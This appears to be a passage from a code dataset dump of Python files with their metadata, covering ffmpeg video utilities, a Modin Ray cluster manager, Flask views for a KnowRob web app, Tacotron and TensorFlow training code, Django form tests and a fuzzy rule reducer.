image.load_img(os.path.join(test_dir, img_name_i))\n #resize\n img_i_reshape,img_ori_size = resize_image(img_i)\n x = image.img_to_array(img_i_reshape)\n X_test.append(x)\n X_test_size.append(img_ori_size)\n\n\n # Return train and test data as numpy arrays.\n return np.array(X_train), np.array(X_test), X_test_size\n\ndef resize_image(im):\n '''\n N*M is resized to N*N\n :param im: image cls\n :return: if idx==0 N==M\n '''\n (x,y) = im.size\n if x==y:\n return im, (x,y)\n elif x>y:\n N = y\n M = x\n idx_bigger = 1\n else:\n N = x\n M = y\n idx_bigger = 2\n out = im.resize((N,N), Image.ANTIALIAS)\n\n return out, (x,y)\n\n\n\ndef ffmpegProcess(code):\n '''\n run ffmepg code\n '''\n getmp3 = code\n returnget = subprocess.call(getmp3,shell=True)\n # print(returnget)\n\ndef extractFrameOfVideo(video_path,frame_rate=30,frame_save_path='./coverSource'):\n DivideCode = 'ffmpeg -i ' + video_path + ' -r '+str(frame_rate)+' '+frame_save_path+'%06d.png'\n ffmpegProcess(DivideCode)\n return\n\ndef generateVideo(frame_save_path='./hideSource',output_path='./test.mp4',frame_rate=5):\n generateCode = \"ffmpeg -framerate \"+str(frame_rate)+\" -i \"+frame_save_path+\"\\%d.png -vcodec libx264 -r \"\\\n +str(frame_rate)+\" -pix_fmt yuv420p \"+output_path\n ffmpegProcess(generateCode)\n\ndef readFrames(file_path):\n '''\n :return: list of framePath and num of file\n '''\n fs = os.listdir(file_path)\n fs.sort(key=lambda x: int(x[:-4]))\n file_name_list = []\n cnt=0\n for f in fs:\n file_name_list.append(os.path.join(file_path,f))\n cnt += 1\n return file_name_list,cnt\n\ndef randomSort(file_name_list,length,key,mode='encode'):\n '''\n if you want to recover the length and key must keep same\n :param file_name_list:\n :param length: number of files\n :param key: as seed\n :return: resorted list\n '''\n\n random.seed(key)\n # generate the random order\n rs = random.sample(range(length),length)\n resorted_list = []\n if mode=='encode':\n for i in range(length):\n resorted_list.append(file_name_list[rs[i]])\n print(resorted_list)\n elif mode =='decode':\n tmp = list(range(length))\n for i in range(length):\n tmp[rs[i]] = file_name_list[i]\n resorted_list = tmp\n print(resorted_list)\n else:\n print('mode wrong\\n')\n\n return 
resorted_list\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"509819191","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\nimport threading\nimport os\nimport traceback\nimport sys\nfrom hashlib import sha1\nfrom typing import Callable\n\nimport yaml\nfrom ray.autoscaler.commands import (\n create_or_update_cluster,\n teardown_cluster,\n get_head_node_ip,\n _bootstrap_config,\n)\n\nfrom .base import (\n CannotSpawnCluster,\n CannotDestroyCluster,\n ConnectionDetails,\n _get_ssh_proxy_command,\n)\nfrom .cluster import BaseCluster, Provider\n\n\nclass _ThreadTask:\n def __init__(self, target: Callable):\n self.target = target\n self.thread: threading.Thread = None\n self.exc: Exception = None\n self.silent = False\n\n\nclass _Immediate:\n def __init__(self, target: Callable):\n self.target = target\n\n def start(self):\n self.target()\n\n def join(self):\n pass\n\n\nclass RayCluster(BaseCluster):\n target_engine = \"Cloudray\"\n target_partition = \"Pandas\"\n\n __base_config = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"ray-autoscaler.yml\"\n )\n __instance_key = {Provider.AWS: \"InstanceType\"}\n __image_key = {Provider.AWS: \"ImageId\"}\n __credentials_env = {Provider.AWS: \"AWS_SHARED_CREDENTIALS_FILE\"}\n\n def __init__(self, *a, **kw):\n self.spawner = _ThreadTask(self.__do_spawn)\n self.destroyer = _ThreadTask(self.__do_destroy)\n\n self.ready = False\n super().__init__(*a, **kw)\n\n if self.provider.credentials_file is not None:\n try:\n config_key = self.__credentials_env[self.provider.name]\n except KeyError:\n raise ValueError(f\"Unsupported provider: {self.provider.name}\")\n os.environ[config_key] = self.provider.credentials_file\n\n self.config = self.__make_config()\n self.config_file = self.__save_config(self.config)\n\n def _spawn(self, wait=True):\n self.__run_thread(wait, self.spawner)\n\n def _destroy(self, wait=True):\n self.__run_thread(wait, self.destroyer)\n\n def __run_thread(self, wait, task: _ThreadTask):\n if not task.thread:\n task.thread = (_Immediate if wait else threading.Thread)(target=task.target)\n task.thread.start()\n\n if wait:\n task.silent = True\n task.thread.join()\n exc, task.exc = task.exc, None\n if exc:\n raise exc\n\n def __make_config(self):\n with open(self.__base_config) as inp:\n config = yaml.safe_load(inp.read())\n\n # cluster and provider details\n config[\"cluster_name\"] = self.cluster_name\n config[\"min_workers\"] = self.worker_count\n config[\"max_workers\"] = self.worker_count\n config[\"initial_workers\"] = self.worker_count\n config[\"provider\"][\"type\"] = self.provider.name\n if self.provider.region:\n 
config[\"provider\"][\"region\"] = self.provider.region\n if self.provider.zone:\n config[\"provider\"][\"availability_zone\"] = self.provider.zone\n\n # connection details\n config[\"auth\"][\"ssh_user\"] = \"ubuntu\"\n socks_proxy_cmd = _get_ssh_proxy_command()\n if socks_proxy_cmd:\n config[\"auth\"][\"ssh_proxy_command\"] = socks_proxy_cmd\n\n # instance types\n try:\n instance_key = self.__instance_key[self.provider.name]\n image_key = self.__image_key[self.provider.name]\n except KeyError:\n raise ValueError(f\"Unsupported provider: {self.provider.name}\")\n\n config[\"head_node\"][instance_key] = self.head_node_type\n config[\"head_node\"][image_key] = self.provider.image\n config[\"worker_nodes\"][instance_key] = self.worker_node_type\n config[\"worker_nodes\"][image_key] = self.provider.image\n\n return _bootstrap_config(config)\n\n @staticmethod\n def __save_config(config):\n cfgdir = os.path.abspath(os.path.expanduser(\"~/.modin/cloud\"))\n os.makedirs(cfgdir, mode=0o700, exist_ok=True)\n namehash = sha1(repr(config).encode(\"utf8\")).hexdigest()[:8]\n entry = os.path.join(cfgdir, f\"config-{namehash}.yml\")\n\n with open(entry, \"w\") as out:\n out.write(yaml.dump(config))\n return entry\n\n def __do_spawn(self):\n try:\n create_or_update_cluster(\n self.config_file,\n override_min_workers=None,\n override_max_workers=None,\n no_restart=False,\n restart_only=False,\n yes=True,\n override_cluster_name=None,\n )\n # need to re-load the config, as create_or_update_cluster() modifies it\n with open(self.config_file) as inp:\n self.config = yaml.safe_load(inp.read())\n self.ready = True\n except BaseException as ex:\n self.spawner.exc = CannotSpawnCluster(\n \"Cannot spawn cluster\", cause=ex, traceback=traceback.format_exc()\n )\n if not self.spawner.silent:\n sys.stderr.write(f\"Cannot spawn cluster:\\n{traceback.format_exc()}\\n\")\n\n def __do_destroy(self):\n try:\n teardown_cluster(\n self.config_file,\n yes=True,\n workers_only=False,\n override_cluster_name=None,\n keep_min_workers=0,\n )\n self.ready = False\n self.config = None\n except BaseException as ex:\n self.destroyer.exc = CannotDestroyCluster(\n \"Cannot destroy cluster\", cause=ex, traceback=traceback.format_exc()\n )\n if not self.destroyer.silent:\n sys.stderr.write(f\"Cannot destroy cluster:\\n{traceback.format_exc()}\\n\")\n\n def _get_connection_details(self) -> ConnectionDetails:\n \"\"\"\n Gets the coordinates on how to connect to cluster frontend node.\n \"\"\"\n assert self.ready, \"Cluster is not ready, cannot get connection details\"\n return ConnectionDetails(\n user_name=self.config[\"auth\"][\"ssh_user\"],\n key_file=self.config[\"auth\"][\"ssh_private_key\"],\n address=get_head_node_ip(self.config_file, override_cluster_name=None),\n )\n\n def _get_main_python(self) -> str:\n \"\"\"\n Gets the path to 'main' interpreter (the one that houses created environment for running everything)\n \"\"\"\n return \"~/miniconda/envs/modin/bin/python\"\n","sub_path":"modin/experimental/cloud/rayscale.py","file_name":"rayscale.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"556271622","text":"\"\"\" openscad-board-maker.py\n\nUsage:\n openscad-board-maker.py \n\n\"\"\"\n\nfrom solid import *\n\nimport docopt\n\nif __name__ == \"__main__\":\n args = docopt.docopt(__doc__)\n\n l = float(args[\"\"])\n w = float(args[\"\"])\n\n r = 4\n\n rect1 = cube(size=(l, w - 2*r, 1.6), center=True)\n rect2 = cube(size=(l - 2*r, 
w, 1.6), center=True)\n\n corner_centers = (l/2-r, w/2-r)\n\n corners = [\n translate(v=(corner_centers[0], corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n ),\n translate(v=(-corner_centers[0], corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n ),\n translate(v=(corner_centers[0], -corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n ),\n translate(v=(-corner_centers[0], -corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n )\n ]\n\n a = union()(rect1, rect2, *corners)\n\n scad_render_to_file(a, file_header='$fn = 48;', include_orig_code=True)","sub_path":"openscad-board-maker.py","file_name":"openscad-board-maker.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"318554377","text":"\nfrom flask import session, jsonify, request, redirect, render_template, url_for, Markup, send_from_directory\nfrom flask_user import login_required\nfrom flask.ext.misaka import markdown\n\nimport os, re\nimport json\n\nfrom urlparse import urlparse\n\nfrom webrob.app_and_db import app, db\nfrom webrob.user.knowrob_user import read_tutorial_page\nfrom webrob.docker.docker_application import ensure_application_started\nfrom webrob.docker import docker_interface\n\nfrom utility import *\n\nMAX_HISTORY_LINES = 50\n\n@app.route('/knowrob/static/')\n@login_required\ndef download_static(filename):\n return send_from_directory(os.path.join(app.root_path, \"static\"), filename)\n\n@app.route('/knowrob/knowrob_data/')\n@login_required\ndef download_logged_image(filename):\n return send_from_directory('/home/ros/knowrob_data/', filename)\n\n@app.route('/knowrob/summary_data/')\n@login_required\ndef download_summary_image(filename):\n # TODO migrate summary_data -> users own data container and use docker_interface to retrieve summary!\n return send_from_directory('/home/ros/summary_data/', filename)\n\n@app.route('/knowrob/tutorials/')\n@app.route('/knowrob/tutorials//')\n@app.route('/knowrob/tutorials//')\n# @login_required\ndef tutorials(cat_id='getting_started', page=1):\n session['video'] = 0\n if not ensure_application_started('knowrob/hydro-knowrob-daemon'):\n return redirect(url_for('/knowrob/tutorials/'))\n \n error=\"\"\n # determine hostname/IP we are currently using\n # (needed for accessing container)\n host_url = urlparse(request.host_url).hostname\n container_name = session['user_container_name'] # 'tutorials'\n show_south_pane = False\n readonly = True\n authentication = False\n\n tut = read_tutorial_page(cat_id, page)\n content = markdown(tut.text, fenced_code=True)\n\n # automatically add event handler for highlighting DOM elements\n tmp = re.findall('(.*?)', str(content))\n for t in tmp:\n if 'hl_' in t:\n text = t.split(' hl_')[0]\n idname = t.split(' hl_')[1]\n content = re.sub('{} hl_{}'.format(text, idname), '{1}'.format(idname, text), str(content))\n elif 'hlc_' in t:\n text = t.split(' hlc_')[0]\n classname = t.split(' hlc_')[1]\n content = re.sub('{} hlc_{}'.format(text, classname), '{1}'.format(classname, text), str(content))\n\n # automatically add \"ask as query\" links after code blocks\n content = re.sub('(\\s)?', \"
\", str(content))\n content = Markup(content)\n\n # check whether there is another tutorial in this category\n nxt = read_tutorial_page(cat_id, int(page)+1)\n prev = read_tutorial_page(cat_id, int(page)-1)\n\n return render_template('knowrob_tutorial.html', **locals())\n\n@app.route('/knowrob/')\n@app.route('/knowrob/hydro-knowrob-daemon')\n@app.route('/knowrob/exp/')\n@login_required\ndef knowrob(exp_path=None):\n session['video'] = 0\n if not ensure_application_started('knowrob/hydro-knowrob-daemon'):\n return redirect(url_for('user.logout'))\n \n error=\"\"\n # determine hostname/IP we are currently using\n # (needed for accessing container)\n host_url = urlparse(request.host_url).hostname\n\n container_name = session['user_container_name']\n show_south_pane = True\n # Remember experiment selection\n if exp_path is not None: session['exp'] = exp_path\n # Select a query file\n exp_query_file = None\n if 'exp' in session:\n exp = session['exp']\n if exp is not None: exp_query_file = exp + '.json'\n # TODO: Allow to select html template using a experiment configuration file\n\n return render_template('knowrob_simple.html', **locals())\n\n@app.route('/knowrob/video')\n@app.route('/knowrob/video/exp/')\n@login_required\ndef video(exp_path=None):\n session['video'] = 1\n if not ensure_application_started('knowrob/hydro-knowrob-daemon'):\n return redirect(url_for('user.logout'))\n \n error=\"\"\n # determine hostname/IP we are currently using\n # (needed for accessing container)\n host_url = urlparse(request.host_url).hostname\n container_name = session['user_container_name']\n\n # Remember experiment selection\n if exp_path is not None: session['exp'] = exp_path\n # Select a query file\n exp_query_file = None\n if 'exp' in session:\n exp = session['exp']\n if exp is not None: exp_query_file = exp + '.json'\n \n return render_template('video.html', **locals())\n\n@app.route('/knowrob/menu', methods=['POST'])\n@app.route('/knowrob/hydro-knowrob-daemon/menu', methods=['POST'])\ndef menu():\n knowrobUrl = '/knowrob/'\n \n menu_left = [\n ('Knowledge Base', knowrobUrl),\n ('Robot Memory Replay', knowrobUrl+'video'),\n ('Editor', knowrobUrl+'editor')\n ]\n \n exp_selection = __exp_file__()\n if exp_selection is None: exp_selection = \"Experiment\"\n \n exp_choices_map = {}\n for (submenu,exp) in __exp_list__():\n # Find exp url\n exp_url = knowrobUrl\n if __is_video__():\n exp_url += 'video/'\n exp_url += 'exp/'\n if len(submenu)>0:\n exp_url += submenu + '/'\n exp_url += exp\n \n menu = ''\n if len(submenu)>0:\n menu = submenu\n if not menu in exp_choices_map:\n exp_choices_map[menu] = []\n \n exp_choices_map[menu].append((exp, exp_url))\n \n exp_choices = []\n exp_map_keys = exp_choices_map.keys()\n exp_map_keys.sort()\n \n for key in exp_map_keys:\n if key == '': continue\n exp_choices_map[key].sort()\n exp_choices.append(('CHOICES', (key+' >>', exp_choices_map[key])))\n if '' in exp_map_keys:\n exp_choices_map[''].sort()\n exp_choices += exp_choices_map['']\n \n menu_right = [\n ('CHOICES', (exp_selection, exp_choices))\n ]\n \n return jsonify(menu_left=menu_left, menu_right=menu_right)\n\ndef __exp_menu_file__(f, category):\n if f.endswith(\".json\"):\n return (category, f[0:len(f)-len(\".json\")])\n else:\n return None\n \ndef __exp_list__():\n expList = []\n exp_root_path = os.path.join(app.root_path, \"static/experiments/queries\")\n \n for f0 in os.listdir(exp_root_path):\n exp_path = os.path.join(exp_root_path, f0)\n \n # Query file with submenu\n if os.path.isdir(exp_path):\n for f1 in 
os.listdir(exp_path):\n menu_entry = __exp_menu_file__(f1, f0)\n if menu_entry != None: expList.append(menu_entry)\n \n # Query file without submenu\n else:\n menu_entry = __exp_menu_file__(f0, '')\n if menu_entry != None: expList.append(menu_entry)\n \n return expList\n\ndef __exp_file__():\n if 'exp' in session:\n return session['exp']\n else:\n return None\n\ndef __is_video__():\n if 'video' in session:\n return session['video']\n else:\n return 0\n \n@app.route('/knowrob/exp_set', methods=['POST'])\n@login_required\ndef exp_set():\n expName = json.loads(request.data)['experimentName']\n session['exp'] = expName\n return jsonify(result=None)\n\n@app.route('/knowrob/add_history_item', methods=['POST'])\n@login_required\ndef add_history_item():\n query = json.loads(request.data)['query']\n hfile = get_history_file()\n # Remove newline characters\n query.replace(\"\\n\", \" \")\n \n # Read history\n lines = []\n if os.path.isfile(hfile):\n f = open(hfile)\n lines = f.readlines()\n f.close()\n # Append the last query\n lines.append(query+\".\\n\")\n # Remove old history items\n numLines = len(lines)\n lines = lines[max(0, numLines-MAX_HISTORY_LINES):numLines]\n \n with open(hfile, \"w\") as f:\n f.writelines(lines)\n \n return jsonify(result=None)\n\n@app.route('/knowrob/get_history_item', methods=['POST'])\n@login_required\ndef get_history_item():\n index = json.loads(request.data)['index']\n \n if index<0:\n return jsonify(item=\"\", index=-1)\n \n hfile = get_history_file()\n if os.path.isfile(hfile):\n # Read file content\n f = open(hfile)\n lines = f.readlines()\n f.close()\n \n # Clamp index\n if index<0: index=0\n if index>=len(lines): index=len(lines)-1\n if index<0: return jsonify(item=\"\", index=-1)\n \n item = lines[len(lines)-index-1]\n item = item[:len(item)-1]\n \n return jsonify(item=item, index=index)\n \n else:\n return jsonify(item=\"\", index=-1)\n\n\ndef get_history_file():\n userDir = get_user_dir()\n return os.path.join(get_user_dir(), \"query.history\")\n","sub_path":"webapps/knowrob/webrob/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"90323663","text":"\"\"\"Main script. 
Run your experiments from here\"\"\"\nfrom src.dataset import TextToSpeechDataset\nfrom src.Tacotron_model.taco_util import fetch_model,fetch_optimizer,fetch_dataloader\nfrom torch.utils.data.dataset import Subset\nimport src.hparam as hp\nimport torch\nimport src.Tacotron_model.util as utils\nfrom src.Tacotron_model.util import text_to_sequence, wav_to_spectrogram\nfrom src.Tacotron_model.taco_train import train_and_evaluate\n\nimport torch\nimport argparse\nimport os\n\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\nlog = logging.getLogger()\n\n\ndef parse_args():\n \"\"\"Parse command line arguments.\n Returns:\n\t\t(Namespace): arguments\n\t\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-l', '--logdir', type=str,\n\t\t\t\t\t\tdefault='log/tacotron',\n\t\t\t\t\t\thelp='parent directory of experiment logs (checkpoints/tensorboard events)')\n parser.add_argument('--log_level', type=str, default='WARNING',\n\t\t\t\t\t\thelp='log level to be used')\n parser.add_argument('-n', '--name', type=str, default='Training-naive',\n\t\t\t\t\t\thelp='name of experiment')\n parser.add_argument('-c', '--checkpoint', type=str, default=None,\n\t\t\t\t\t\trequired=False, help='path to checkpoint')\n parser.add_argument('--default_hparams', type=str,\n\t\t\t\t\t\tdefault='Tacotron_model/taco_hparams.yaml', help='path to .yaml with default hparams')\n parser.add_argument('--hparams', type=str,\n\t\t\t\t\t\trequired=False, help='comma separated name=value pairs')\n parser.add_argument('--data', type=str, default='/home/rajanie/Documents/Semester2/TTS/LJSpeech-1.1/',\n\t\t\t\t\t\thelp='csv file of texts and audio names in LLJDS Format')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n # set log level\n assert (args.log_level in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'])\n log.setLevel(logging.getLevelName(args.log_level))\n # make sure log directory exists\n logdir = os.path.join(args.logdir, args.name)\n if not os.path.isdir(logdir):\n log.info(\"Creating directory {}\".format(logdir))\n os.makedirs(logdir)\n os.chmod(logdir, 0o775)\n hparams = hp.load_params_from_yaml(args.default_hparams)\n hparams.parse(args.hparams)\n hp.write_params_to_yaml(hparams, os.path.join(logdir, 'hparams.yaml'))\n #print(hparams)\n\n\n # set seed for reproducible experiments\n torch.manual_seed(hparams.seed)\n if torch.cuda.is_available():\n log.info(\"CUDA is available. Using GPU.\")\n torch.cuda.manual_seed(hparams.seed)\n torch.backends.cudnn.benchmark = True\n hparams.device = torch.device(\"cuda:0\")\n hparams.cuda = True\n else:\n log.info(\"CUDA is not available. 
Using CPU.\")\n hparams.device = torch.device(\"cpu\")\n hparams.cuda = False\n\n\n \n\n PATH = args.data\n dataset = TextToSpeechDataset(path = PATH,\n text_embeddings=text_to_sequence,\n mel_transforms=wav_to_spectrogram)\n logdir = args.logdir\n checkpoint = args.checkpoint\n fetch_dataloader(dataset,hparams)\n\n\n #train_and_evaluate(dataset, hparams, logdir)\n\n #melnet.cuda(device:0)\n # melnet #=melnet.load_state_dict(torch.load('/home/rajaniep/code/UntitledFolder/runs/melnet.pt'))\n\n\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"618777962","text":"from django.test import TestCase\n\nimport mock\nfrom model_mommy import mommy\n\nfrom battles.forms import CreateBattleForm, CreateTeamForm\nfrom pokemon.helpers import save_pokemon\nfrom pokemon.models import Pokemon\n\n\nclass TestCreateTeamForm(TestCase):\n def setUp(self):\n self.trainer = mommy.make(\"users.User\")\n self.pokemon_1 = mommy.make(\"pokemon.Pokemon\", attack=50, defense=50, hp=50)\n self.pokemon_2 = mommy.make(\"pokemon.Pokemon\", attack=50, defense=50, hp=50)\n self.pokemon_3 = mommy.make(\"pokemon.Pokemon\", attack=50, defense=50, hp=50)\n self.battle = mommy.make(\"battles.Battle\")\n\n def test_create_a_team(self):\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": self.pokemon_2.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"1\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertTrue(form.is_valid())\n\n def test_team_cant_have_identical_pokemon(self):\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": self.pokemon_1.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"1\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertFalse(form.is_valid())\n self.assertEqual(\n [\"Your team has duplicates, please use unique pokemon\"], form.non_field_errors()\n )\n\n @mock.patch(\"pokemon.helpers.get_pokemon_stats\")\n def test_pokemon_exceeds_points_limit(self, mock_get_pokemon_stats):\n mock_get_pokemon_stats.return_value = {\n \"name\": \"mock_name\",\n \"id\": 493,\n \"sprite\": \"\",\n \"attack\": 360,\n \"defense\": 360,\n \"hp\": 360,\n }\n\n save_pokemon(493)\n pokemon_493 = Pokemon.objects.get(id=493)\n\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": pokemon_493.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"1\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertFalse(form.is_valid())\n self.assertEqual(\n [\"Your team exceeds the 600 points limit, please choose another team\"],\n form.non_field_errors(),\n )\n assert mock_get_pokemon_stats.called\n\n def test_more_than_one_pokemon_cant_battle_in_the_same_round(self):\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": self.pokemon_2.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"2\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertFalse(form.is_valid())\n self.assertEqual([\"Please allocate one pokemon per round\"], form.non_field_errors())\n\n\nclass TestCreateBattleForm(TestCase):\n def setUp(self):\n 
self.creator = mommy.make(\"users.User\")\n self.opponent = mommy.make(\"users.User\")\n\n def test_form_is_valid(self):\n params = {\n \"initial\": {\"user_creator\": self.creator},\n \"data\": {\"user_creator\": self.creator.id, \"user_opponent\": self.opponent.id},\n }\n form = CreateBattleForm(**params)\n self.assertTrue(form.is_valid())\n","sub_path":"backend/battles/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"441287515","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 4 13:34:22 2018\n\n@author: evanderdcosta\n\"\"\"\n\nimport inspect\nimport os\nimport tensorflow as tf\n\ndef class_vars(obj):\n return{k:v for k,v in inspect.getmembers(obj) \n if not k.startswith('__') and not callable(k)}\n \n\nclass BaseModel(object):\n def __init__(self, config, sess):\n self.config = config\n self.sess = sess\n self._saver = None\n \n # Keep a graph variable tracking steps\n # Can use this for annealing, etc\n with tf.variable_scope('step'):\n self.step = tf.Variable(0, trainable=False, name='step')\n self.step_input = tf.placeholder('int32', None, name='step_input')\n self.step_assign_op = self.step.assign(self.step_input)\n \n \n try:\n self._attrs = config.__dict__['__flags']\n except:\n self._attrs = class_vars(config)\n print(self._attrs)\n \n for attr in self._attrs:\n name = attr if not attr.startswith('_') else attr[1:]\n setattr(self, name, getattr(self.config, attr))\n \n \n def save_model(self, step=None):\n print(\"[*] Saving a checkpoint\")\n if(not os.path.exists(self.checkpoint_dir)):\n os.makedirs(self.checkpoint_dir)\n self.saver.save(self.sess, self.checkpoint_dir, global_step=self.step)\n \n def load_model(self):\n print(\"[*] Loading a model\")\n chkpt = tf.train.get_checkpoint_state(self.checkpoint_dir)\n if(chkpt and chkpt.model_checkpoint_path):\n chkpt_name = os.path.basename(chkpt.model_checkpoint_path)\n fname = os.path.join(self.checkpoint_dir, chkpt_name)\n self.saver.restore(self.sess, fname)\n print(\"[*] SUCCESS!\")\n return True\n else:\n print(\"Model load failed....\")\n return False\n \n @property\n def checkpoint_dir(self):\n return os.path.join('checkpoints', self.model_dir)\n \n @property\n def model_dir(self):\n model_dir = self.config.name\n for k, v in self._attrs.items():\n if not k.startswith('_') and k not in ['display']:\n model_dir += \"/%s-%s\" % (k, \",\".join([str(i) for i in v])\n if type(v) == list else v)\n return model_dir + '/'\n\n @property\n def saver(self):\n if(self._saver == None):\n self._saver = tf.train.Saver(max_to_keep=10)\n return self._saver\n","sub_path":"base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"270486410","text":"import datetime\n\ndef getDateTime(str_date):\n\t'''\n\tConverts string date to a date time object.\n\tParameters\n\t----------\n\tstr_date (String): A date string\n\tReturns\n\t-------\n\tDatetime object\n\n\t'''\n\tif len(str_date) == 0:\n\t return 'None'\n\telse:\n\t dt_format = \"%Y-%m-%d %H:%M:%S.%f\"\n\t return datetime.datetime.strptime(str_date, dt_format)","sub_path":"preprocess/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"211437404","text":"import numpy 
as np\nfrom SistemaFuzzy.Model import Regra\n\n\nclass Reducao:\n\n def __init__(self, regras, instancias, particoes):\n self.regrasComRuido = regras\n self.regras_para_classificacao = []\n self.instancias = instancias\n self.particoes = particoes\n self.regras = []\n self.tnormas = []\n\n def reduzir(self):\n for instancia in self.instancias:\n caracteristicas = instancia.caracteristicas\n classe = instancia.classe\n for regraAtual in self.regrasComRuido:\n antecedentes_regras = regraAtual.antecedentes\n consequente = regraAtual.consequente\n pertinencias_maximas = []\n for id_antecedente, caracteristica, particao in zip(antecedentes_regras, caracteristicas, self.particoes):\n #print(id_antecedente, caracteristicas, particao)\n pertinencia = particao.getPertinenciaIdConjunto(id_antecedente, caracteristica)\n pertinencias_maximas.append(pertinencia)\n tnorma = np.prod(pertinencias_maximas)\n self.atualizarRegras(tnorma, regraAtual)\n self.preencher_regra_nula()\n\n #print(\"1 - \", len(self.regrasComRuido))\n #print(\"2 - \", len(self.regras))\n #print(\"3 - \", len(self.regrasSemRuido))\n #for regra in self.regrasSemRuido:\n # print(regra)\n #a = 2 + \"2\"\n return self.regrasSemRuido\n\n def preencher_regra_nula(self):\n for regra in self.regrasComRuido:\n regraNula = Regra.Regra([-1] * len(regra.antecedentes), -1, 1, 1)\n self.regrasSemRuido.append(regraNula)\n for posicao, regra in enumerate(self.regrasComRuido):\n if regra in self.regras:\n self.regrasSemRuido[posicao] = regra\n\n\n\n def atualizarRegras(self, tnorma, regraAtual):\n\n if tnorma > 0:\n index, cond = self.inconsistencia(regraAtual)\n if not cond:\n self.regras.append(regraAtual)\n self.tnormas.append(tnorma)\n elif self.tnormas[index] < tnorma:\n self.regras[index] = regraAtual\n self.tnormas[index] = tnorma\n\n def inconsistencia(self, novaRegra):\n for index, r in enumerate(self.regras):\n if r.__eq__(novaRegra):\n return index, True\n return -1, False\n\n\nregra1 = Regra.Regra([1, 1, 1, 1], 1, 0.5)\nregra2 = Regra.Regra([1, 1, 1, 2], 1, 0.7)\nregra3 = Regra.Regra([1, 1, 1, 2], 2, 0.5)\nregra4 = Regra.Regra([1, 1, 1, 3], 3, 0.5)\n\nregras = [regra1,regra2,regra3,regra4]\nsemDuplicidade = []\nfor regra in regras:\n if not regra in semDuplicidade:\n semDuplicidade.append(regra)\nsemAmbiguidade = []\ncomAmbiguidade = []\nfor regra in semDuplicidade:\n encontrou = False\n for sa in semAmbiguidade:\n if regra.eq_antecedentes(sa):\n semAmbiguidade.remove(sa)\n comAmbiguidade.append(sa)\n comAmbiguidade.append(regra)\n encontrou = True\n if not encontrou:\n semAmbiguidade.append(regra)\n\n\"\"\"\nprint(\"Sem Ambiguidade\")\nfor regra in semAmbiguidade:\n print(regra.__str__())\n\nprint(\"Com Ambiguidade\")\nfor regra in comAmbiguidade:\n print(regra.__str__())\n\nregrasTratadas = semAmbiguidade\"\"\"\n\n\n\n","sub_path":"100-Testes/Reducao_RegrasV2.py","file_name":"Reducao_RegrasV2.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"377376468","text":"import math\nimport 